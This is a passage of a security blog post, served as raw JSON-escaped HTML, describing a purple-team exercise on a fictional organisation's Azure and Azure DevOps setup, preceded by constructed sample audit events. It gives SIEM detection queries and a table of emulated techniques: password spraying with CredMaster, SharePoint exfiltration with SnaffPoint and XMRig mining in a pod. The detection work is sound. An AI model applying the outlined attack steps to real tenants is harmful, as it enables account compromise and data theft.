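SAMPLE_EVENTS = [  # constructed; actionId of the policy event is assumed, the check keys on the policy fields
    {"eventType": "AzureDevOpsAuditEvent", "data": {
        "actionId": "OrganizationPolicy.PolicyChanged", "actorUPN": "alice@fakeorg.example",
        "ipAddress": "1.2.3.4", "scopeType": "Organization",
        "data": {"PolicyName": "Policy.DisallowOAuthAuthentication", "PolicyValue": False}}},
    {"eventType": "AzureDevOpsAuditEvent", "data": {
        "actionId": "Security.ModifyPermission", "actorUPN": "alice@fakeorg.example", "ipAddress": "1.2.3.4",
        "data": {"SubjectDisplayName": "[FakeORG]\\TestGroup1234", "ChangedPermission": "Administer workspaces",
                 "PermissionModifiedTo": "Allow"}}},
    {"eventType": "AzureDevOpsAuditEvent", "data": {
        "actionId": "Security.ModifyPermission", "actorUPN": "bob@fakeorg.example", "ipAddress": "10.0.0.7",
        "data": {"SubjectDisplayName": "[FakeORG]\\Readers", "ChangedPermission": "View instance-level information",
                 "PermissionModifiedTo": "Allow"}}},
    {"eventType": "AzureDevOpsAuditEvent", "data": {
        "actionId": "Git.RepositoryCreated", "actorUPN": "bob@fakeorg.example", "ipAddress": "10.0.0.7",
        "data": {"RepoName": "api"}}},
]
```

Over SAMPLE_EVENTS, policy_changes returns the single OAuth policy event marked permissive, and permission_changes returns both Security.ModifyPermission entries with only the "Administer workspaces" grant to TestGroup1234 marked elevated; the repository-creation event matches neither check.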
<br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"1447\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Purple-teaming-Azure-DevOps.jpg\" alt=\"Purple teaming Azure DevOps\" class=\"wp-image-4576\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-dbfb3086fcd5b22a9f416102a41b8a8b\">The telemetry is examined and a query is crafted: <br><\/p>\n\n\n\n<pre>_source=\"AzureDevOps\" and _collector=\"AzureDevOps\"\r\n| %\"data.data.policyname\" as policy_name\r\n| %\"data.data.policyvalue\" as policy_value\r\n| %\"data.actorupn\" as upn\r\n| %\"data.ipaddress\" as ip_address\r\n| where !isNull(policy_value)\r\n| where policy_name = \"Policy.DisallowOAuthAuthentication\"\r\n| values(policy_name) as policy_name,values(policy_value) as policy_value by upn,ip_address\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-9d1b45c62953cb1ae65c06fc2f89d0ef\">And the results returned:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"776\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Policy-tampering.jpg\" alt=\"Policy tampering\" class=\"wp-image-4577\" title=\"\"><\/figure>\n<\/div>\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-e97a42f914be2c0e5c540924e382285a\" id=\"permission_changes\">Permission changes<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-cd62b9dc512d77da8d617eb1a3746609\">For the next and final execution, the team wants to see if they can capture Azure DevOps permission changes.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-3c82bd3c58e5490a10d93bbd01a5860e\">A group named \u201cTestGroup1234\u201d is created and the group is granted 
\u201cAdminister workspaces\u201d permissions:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1538\" height=\"1868\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Permission-changes.jpg\" alt=\"Permission changes\" class=\"wp-image-4578\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-7e70c1e6481941a73a68427a3afd97de\"><strong><br><\/strong><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-cce8b2ee250d613ae881f015f11bc488\">After digging through the telemetry, the following query is crafted: <br><\/p>\n\n\n\n<pre>_source=\"AzureDevOps\" and _collector=\"AzureDevOps\"\r\n| where %\"data.actionid\" = \"Security.ModifyPermission\"\r\n| %\"data.data.permissionmodifiedto\" as permission_modified_to\r\n| %\"data.data.changedpermission\" as permission_changed\r\n| %\"data.data.subjectdisplayname\" as subject_of_change\r\n| %\"data.ipaddress\" as src_ip\r\n| %\"data.actorupn\" as upn\r\n| values(subject_of_change) as subject_of_change,values(permission_changed) as permission_changed,values(permission_modified_to) as permission_modified_to by upn,src_ip\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-190c051facb6c8a1bac3c4a1d05854d2\"><br><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-5cd49dad2a59715e991428ff14e9d8aa\">And the results: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"861\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Administer-workspaces.jpg\" alt=\"Administer workspaces\" class=\"wp-image-4579\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-caab2d2c112238654b624be1f771555d\">And one final time, the notes are 
updated:&nbsp;<\/p>\n\n\n\n<div>\n<table>\n<tbody>\n<tr>\n<td><strong>TTP<\/strong><\/td>\n<td><strong>Replication Steps<\/strong><\/td>\n<td><strong>Required Data Source<\/strong><\/td>\n<td><strong>Existing Detection?&nbsp;<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID<\/td>\n<td>Password spray via CredMaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>No<\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID &#8211; 2nd Attempt<\/td>\n<td>Password spray via Credmaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>Detection crafted<\/td>\n<\/tr>\n<tr>\n<td>Register MFA Device<\/td>\n<td>Browse to aka.ms\/mfasetup, log in with the relevant user account and follow prompts to register a new multi factor authentication device.<\/td>\n<td>Azure AD \/ Entra ID Audit Logs, UserManagement Category<\/td>\n<td>Real-time detection deemed unnecessary, search created and saved<\/td>\n<\/tr>\n<tr>\n<td>SharePoint Exfiltration<\/td>\n<td>Create test SharePoint site, run SnaffPoint to search for a sensitive file and then download the file<\/td>\n<td>Office 365 logs, SharePoint operations<\/td>\n<td>Detection Crafted<\/td>\n<\/tr>\n<tr>\n<td>Teams External Access Enabled<\/td>\n<td>Browse to Office admin portal, enable external access to Teams<\/td>\n<td>Office 365, TeamsAdminAction<\/td>\n<td>No, CloudSIEM Signal created for enablement of external Teams guest access<\/td>\n<\/tr>\n<tr>\n<td>VM Run Command<\/td>\n<td>Browse to Azure Portal, Select test Virtual Machine, Navigate to \u201cRun command\u201d, pick any and execute a benign command<\/td>\n<td>Azure Monitor Diagnostic Setting &#8211; Administrative Events specifically<\/td>\n<td>No, data source missing, was added as part of exercise<\/td>\n<\/tr>\n<tr>\n<td>Delete Virtual machine<\/td>\n<td>Browse to Azure Portal, select test virtual machine, execute deletion<\/td>\n<td>Azure administrative logs<\/td>\n<td>Yes, signal generated<\/td>\n<\/tr>\n<tr>\n<td>Internet Accessible 
Cluster<\/td>\n<td>Attempt to use curl to connect to the cluster\u2019s external IP address<\/td>\n<td>AKS Diagnostic Logs Enabled &#8211; Kubernetes API Server<\/td>\n<td>NA &#8211; configuration change made<\/td>\n<\/tr>\n<tr>\n<td>CryptoMining<\/td>\n<td>Spin up pod, exec into pod, install XMRig on pod<\/td>\n<td>AKS Diagnostic Logs Enabled &#8211; Kubernetes API Server<\/td>\n<td>Existing metrics-based detection, search looking for pod creations created, search for execution into pod also created<\/td>\n<\/tr>\n<tr>\n<td>Allow third-party OAuth to Azure DevOps<\/td>\n<td>Browse to AzureDevOps portal &#8211; Organizational Settings &#8211; Policies &#8211; Turn on Third-party access via OAuth<\/td>\n<td>AzureDevOps Audit Stream, sending to Event Grid<\/td>\n<td>No, detection crafted<\/td>\n<\/tr>\n<tr>\n<td>Grant group \u201cAdminister workspaces\u201d permission in AzureDevOps<\/td>\n<td>Browse to AzureDevOps portal &#8211; Organizational Settings &#8211; Permissions &#8211; Select test group &#8211; add the permission<\/td>\n<td>AzureDevOps Audit Stream, sending to Event Grid<\/td>\n<td>No, detection crafted<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-c88c7616b9d53c6634832a722aaddd61\" id=\"metrics\">Metrics<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-97e6edd500648640dcc30bc6c2fb2752\">The team has had a long few days, knee-deep in TTPs and queries, and is keen to wrap up the purple team exercise, debrief and transfer their rough notes into their instance of <a href=\"https:\/\/github.com\/SecurityRiskAdvisors\/VECTR\" target=\"_blank\" rel=\"noopener\">VECTR<\/a> to present the results of the purple team exercise to leadership.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-7b736a908a5eb9a94c12e7ed86e86e03\">Once all the relevant information has been entered, the overall 
purple team looks like:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"1038\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Metrics.jpg\" alt=\"Metrics\" class=\"wp-image-4580\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-c2c1bb40455b50f88fa2d33bb44e06f2\">With the escalation path:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1925\" height=\"450\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/escalation-path.jpg\" alt=\"escalation path\" class=\"wp-image-4581\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-adb92662610e1b7d7100ab2167c5470b\">In total, this purple team consisted of:<\/p>\n\n\n\n<ul>\n<li><strong>12<\/strong> executions<\/li>\n<li><strong>1<\/strong> system hardened<\/li>\n<li><strong>1<\/strong> additional telemetry source identified as security-relevant and ingested<\/li>\n<li><strong>8<\/strong> new alerts crafted<\/li>\n<li><strong>1<\/strong> new search crafted<\/li>\n<li><strong>1<\/strong> execution detected by an existing rule<\/li>\n<\/ul>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-8831f3f26f0caf7e6d0298442ddda8eb\">A <a href=\"https:\/\/www.sumologic.com\/blog\/cloud-siem-mitre-attack\/\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;CK heatmap<\/a> is also generated for the exercise:&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"conclusion\">Conclusion<\/h2>\n\n\n\n<p class=\"has-text-align-center\">Both the FakeORG team and their leadership are extremely pleased with the results of this purple team exercise.<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" 
height=\"536\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Amazon-Web-Services-environment.jpg\" alt=\"Amazon Web Services environment\" class=\"wp-image-4582\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-e072c80f1ee8aef31183613000c80c77\">The team was able to identify a new telemetry source, craft new searches and alerts and, perhaps most importantly, collaborate across functions to better understand use cases and workflows, which resulted in the hardening of their Kubernetes cluster.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-f68736ccde41a80852196c3778c7cd86\">The team\u2019s Sumo Logic Cloud SIEM instance proved to be a critical resource for the duration of the exercise and handled telemetry at scale from multiple sources.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-da93560796a87b5031b5ba264bec947f\">The team feels much more confident in their threat detection posture and is already looking to perform the same type of exercise on their Amazon Web Services environment!<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-ba02b912579274760af28f32cc59164c\">Learn more about how a <a href=\"https:\/\/www.sumologic.com\/solutions\/cloud-siem\/\" target=\"_blank\" rel=\"noopener\">Cloud SIEM solution<\/a> can help your organization level up 
security.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div><\/section>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":32,"featured_media":25768,"template":"","meta":{"_acf_changed":false,"show_custom_date":false,"custom_date":"","featured":false,"featured_image":0,"learn_more_label":"","image_alt_text":"","learn_more_type":"","show_popup":false,"learn_more_link_file":0,"event_date":false,"event_start_date":"","event_end_date":"","place_holder_image_url":"","post_reading_time":"16","notification_enabled":false,"notification_text":"","notification_logo":"","notification_expiration_time":0,"is_enable_transparent_header":false,"selected_taxonomy_terms":{"blog-category":[137,126,132,127],"blog-tag":[],"translation_priority":[]},"selected_primary_terms":[],"learn_more_link":[],"featured_page_list":[],"notification_enabled_post_list":[],"_gspb_post_css":"","_relevanssi_hide_post":"","_relevanssi_hide_content":"","_relevanssi_pin_for_all":"","_relevanssi_pin_keywords":"","_relevanssi_unpin_keywords":"","_relevanssi_related_keywords":"","_relevanssi_related_include_ids":"","_relevanssi_related_exclude_ids":"","_relevanssi_related_no_append":"","_relevanssi_related_not_related":"","_relevanssi_related_posts":"4668,71369,71176","_relevanssi_noindex_reason":"","inline_featured_image":false,"footnotes":""},"blog-category":[137,126,132,127],"blog-tag":[],"class_list":["post-4583","blog","type-blog","status-publish","has-post-thumbnail","hentry","blog-category-azure","blog-category-cloud-siem","blog-category-containers","blog-category-secops-security"],"acf":[],"_links":{"self":[{"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/blog\/4583","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/blog"}],"about":[{"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/types\/blog"}],"author":[{"embeddable":true,"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/users\/32"}],"version-history":[{"count":5,"href":
"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/blog\/4583\/revisions"}],"predecessor-version":[{"id":71111,"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/blog\/4583\/revisions\/71111"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/media\/25768"}],"wp:attachment":[{"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/media?parent=4583"}],"wp:term":[{"taxonomy":"blog-category","embeddable":true,"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/blog-category?post=4583"},{"taxonomy":"blog-tag","embeddable":true,"href":"https:\/\/www.sumologic.com\/wp-json\/wp\/v2\/blog-tag?post=4583"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}